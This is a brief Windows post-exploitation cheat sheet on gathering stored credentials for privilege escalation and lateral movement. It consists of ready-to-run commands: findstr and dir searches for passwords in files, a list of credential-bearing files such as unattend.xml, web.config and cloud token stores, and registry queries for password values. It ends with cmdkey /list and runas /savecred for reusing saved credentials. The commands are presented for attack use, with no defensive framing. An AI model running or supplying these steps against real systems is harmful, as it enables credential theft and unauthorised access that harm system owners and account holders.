Gathering Stored Credentials
We can look for credentials in the system itself and if the found creds have higher integrity we can use it as for privilege escalation and lateral movement.
Searching Password In Stored Files
- Find Password in File
findstr /s /i /n "Search String" *.txt
Password can be found in following extension
install, backup, .bak, .log, .bat, .cmd, .vbs, .cnf, .conf,
.config, .ini, .xml, .txt, .gpg, .pgp, .p12, .der, .csr, .cer,
id_rsa, id_dsa, .ovpn, .rdp, vnc, ftp, ssh, vpn, git, .kdbx, .db
- Find file with name password
dir /b /a /s c:\ > filename.txt
type filename.txt | findstr /i password
- Look for Interesting Files
unattend.xml
Unattended.xml
sysprep.inf
sysprep.xml
VARIABLES.DAT
setupinfo
setupinfo.bak
web.config
SiteList.xml
.aws\credentials
.azure\accessTokens.json
.azure\azureProfile.json
gcloud\credentials.db
gcloud\legacy_credentials
gcloud\access_tokens.db
Searching Password In Registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Getting Password From Credential Manager
Find all creds available in Credential Manager
cmdkey /list
To use the creds we can use runas command with /savecred option
runas /savecred /user:admin cmd.exe